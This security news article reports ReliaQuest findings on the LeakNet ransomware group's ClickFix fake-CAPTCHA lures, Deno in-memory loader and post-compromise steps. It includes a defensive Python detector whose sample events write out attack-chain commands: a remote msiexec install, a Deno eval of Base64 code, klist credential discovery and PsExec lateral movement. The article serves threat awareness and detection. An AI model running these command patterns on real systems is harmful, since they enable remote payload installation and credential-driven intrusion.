The ransomware operation known as LeakNet has adopted the ClickFix social engineering tactic, delivered through compromised websites, as an initial access technique.
The use of ClickFix, in which users are tricked into manually running malicious commands to fix non-existent errors, is a departure from relying on conventional methods of obtaining initial access, such as stolen credentials purchased from initial access brokers (IABs), ReliaQuest said in a technical report published today.
The second notable aspect of these attacks is the use of a staged command-and-control (C2) loader built on the Deno JavaScript runtime to execute malicious payloads directly in memory.
“The key takeaway here is that both entry paths lead to the same repeatable post-exploitation sequence every time,” the cybersecurity firm said. “That gives defenders something concrete to work with: known behaviors you can detect and disrupt at each stage, well before ransomware deployment, regardless of how LeakNet got in.”
LeakNet first emerged in November 2024, describing itself as a “digital watchdog” and framing its activities as focused on internet freedom and transparency. According to data gathered by Dragos, the group has also targeted industrial entities.
Using ClickFix to breach victims offers several advantages, the most significant being that it reduces dependence on third-party suppliers, lowers the per-victim acquisition cost, and removes the operational bottleneck of waiting for valuable accounts to reach the market.
In these attacks, legitimate-but-compromised websites serve fake CAPTCHA verification checks that instruct users to copy and paste a “msiexec.exe” command into the Windows Run dialog. The attacks are not confined to a particular industry vertical, instead casting a wide net to infect as many victims as possible.
The development comes as more threat actors adopt the ClickFix playbook, since it abuses trusted, everyday workflows to lure users into running rogue commands through legitimate Windows tooling in a way that feels routine and safe.
“LeakNet’s adoption of ClickFix marks both the first documented expansion of the group’s initial access capability and a meaningful strategic shift,” ReliaQuest said.

“By moving away from IABs, LeakNet removes a dependency that naturally constrained how quickly and broadly it could operate. And because ClickFix is delivered through legitimate—but compromised—websites, it doesn’t present the same obvious signals at the network layer as attacker-owned infrastructure.”
Besides the use of ClickFix to initiate the attack chain, LeakNet is assessed to be using a Deno-based loader to execute Base64-encoded JavaScript directly in memory so as to minimize on-disk evidence and evade detection. The payload is designed to fingerprint the compromised system, contact an external server to fetch next-stage malware, and enter a polling loop that repeatedly fetches and executes additional code through Deno.
Separately, ReliaQuest said it also observed an intrusion attempt in which threat actors used Microsoft Teams-based phishing to socially engineer a user into launching a payload chain that resulted in a similar Deno-based loader. While the activity remains unattributed, the use of the bring your own runtime (BYOR) technique either signals a broadening of LeakNet’s initial access vectors, or that other threat actors have adopted the technique.
LeakNet’s post-compromise activity follows a consistent methodology: it begins with the use of DLL side-loading to launch a malicious DLL delivered via the loader, followed by lateral movement using PsExec, data exfiltration, and encryption.
“LeakNet runs cmd.exe /c klist, a built-in Windows command that displays active authentication credentials on the compromised system. This tells the attacker which accounts and services are already reachable without the need for requesting new credentials, so they can move faster and more deliberately,” ReliaQuest said.
“For staging and exfiltration, LeakNet uses S3 buckets, exploiting the appearance of normal cloud traffic to reduce its detection footprint.”
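As a defender-side illustration of the “known behaviors you can detect and disrupt at each stage” point, here is an added example that is not part of the ReliaQuest report or this article: a Python pass over constructed Windows process-creation events that flags each stage described above (a Run-dialog msiexec launch, the Deno loader handed a Base64 blob on its command line, cmd.exe /c klist, and PsExec) and reports whether the full sequence appeared in order. The event shape, the placeholder paths and hosts, the URL-in-command-line heuristic for msiexec and the Base64-length threshold are assumptions; real EDR telemetry carries more fields and the thresholds need tuning.

```python
"""Detection pass over constructed process-creation events for the LeakNet
chain described in the article. Sample events are constructed for
illustration and are not real telemetry."""
import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Stages in the order the article describes them.
STAGES = ("clickfix_msiexec", "deno_memory_loader", "klist_discovery", "psexec_lateral")

# A long run of Base64-alphabet characters marks an encoded payload (assumed threshold).
_B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
_KLIST = re.compile(r"(^|\s)/c\s+klist\b", re.IGNORECASE)


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent):
    """Return the chain stage an event matches, or None if it looks benign."""
    image = _basename(ev.image)
    parent = _basename(ev.parent_image)
    cmd = ev.command_line
    # Stage 1: msiexec started from the Run dialog (explorer.exe is the parent of
    # Run-dialog launches) with a remote package. The URL check is an assumed
    # heuristic; the article only says a msiexec.exe command is pasted into Run.
    if image == "msiexec.exe" and parent == "explorer.exe" and re.search(r"https?://", cmd, re.I):
        return STAGES[0]
    # Stage 2: the Deno runtime given a long Base64 blob, consistent with a loader
    # that executes encoded JavaScript in memory.
    if image == "deno.exe" and _B64_TOKEN.search(cmd):
        return STAGES[1]
    # Stage 3: cmd.exe /c klist, the credential discovery step quoted in the report.
    if image == "cmd.exe" and _KLIST.search(cmd):
        return STAGES[2]
    # Stage 4: the PsExec client or its remote service component.
    if image in ("psexec.exe", "psexec64.exe", "psexesvc.exe"):
        return STAGES[3]
    return None


def detect_chain(events):
    """Return [(stage, event), ...] for every event that matches a stage."""
    return [(classify(ev), ev) for ev in events if classify(ev) is not None]


def chain_complete(events) -> bool:
    """True when all four stages appear in the order the article describes."""
    pos = 0
    for stage, _ in detect_chain(events):
        if stage == STAGES[pos]:
            pos += 1
            if pos == len(STAGES):
                return True
    return False


# Constructed sample data: URL, host and payload are placeholders, not IoCs.
_ENCODED = base64.b64encode(b"console.log('constructed placeholder payload')").decode()
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\msiexec.exe",
              "msiexec.exe /i https://placeholder.invalid/update.msi /qn"),
    ProcEvent(r"C:\Users\user\AppData\Local\Temp\placeholder-dropper.exe",
              r"C:\Users\user\AppData\Local\deno.exe",
              'deno.exe eval "eval(atob(' + repr(_ENCODED) + '))"'),
    ProcEvent(r"C:\Users\user\AppData\Local\deno.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c klist"),
    ProcEvent(r"C:\Windows\System32\cmd.exe", r"C:\Tools\PsExec.exe",
              r"PsExec.exe \\placeholder-host -s cmd.exe"),
]
BENIGN_EVENTS = [
    ProcEvent(r"C:\Windows\System32\services.exe", r"C:\Windows\System32\msiexec.exe", "msiexec.exe /V"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe /c dir"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\tools\deno.exe", "deno.exe run app.ts"),
]

if __name__ == "__main__":
    for stage, ev in detect_chain(SAMPLE_EVENTS):
        print(f"{stage:20} {ev.command_line}")
    print("full chain observed:", chain_complete(SAMPLE_EVENTS))
```

The per-stage classifier is deliberately independent of ordering so that a single hit (for example, a lone `cmd.exe /c klist` from an unusual parent) still surfaces, while `chain_complete` is the higher-confidence signal that the whole sequence the report describes has played out on one host.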
The development comes as Google revealed that Qilin (aka Agenda), Akira (aka RedBike), Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce (aka FireFlame and FuryStorm), and Sinobi emerged as the top 10 ransomware brands with the most victims claimed on their data leak sites.
“In a third of incidents, the initial access vector was confirmed or suspected exploitation of vulnerabilities, most often in common VPNs and firewalls,” Google Threat Intelligence Group (GTIG) said, adding that 77% of analyzed ransomware intrusions involved suspected data theft, up from 57% in 2024.
“Despite ongoing turmoil caused by actor conflicts and disruption, ransomware actors remain highly motivated and the extortion ecosystem demonstrates continued resilience. Several indicators suggest the overall profitability of these operations is, however, declining, and at least some threat actors are shifting their targeting calculus away from large companies to instead focus on higher volume attacks against smaller organizations.”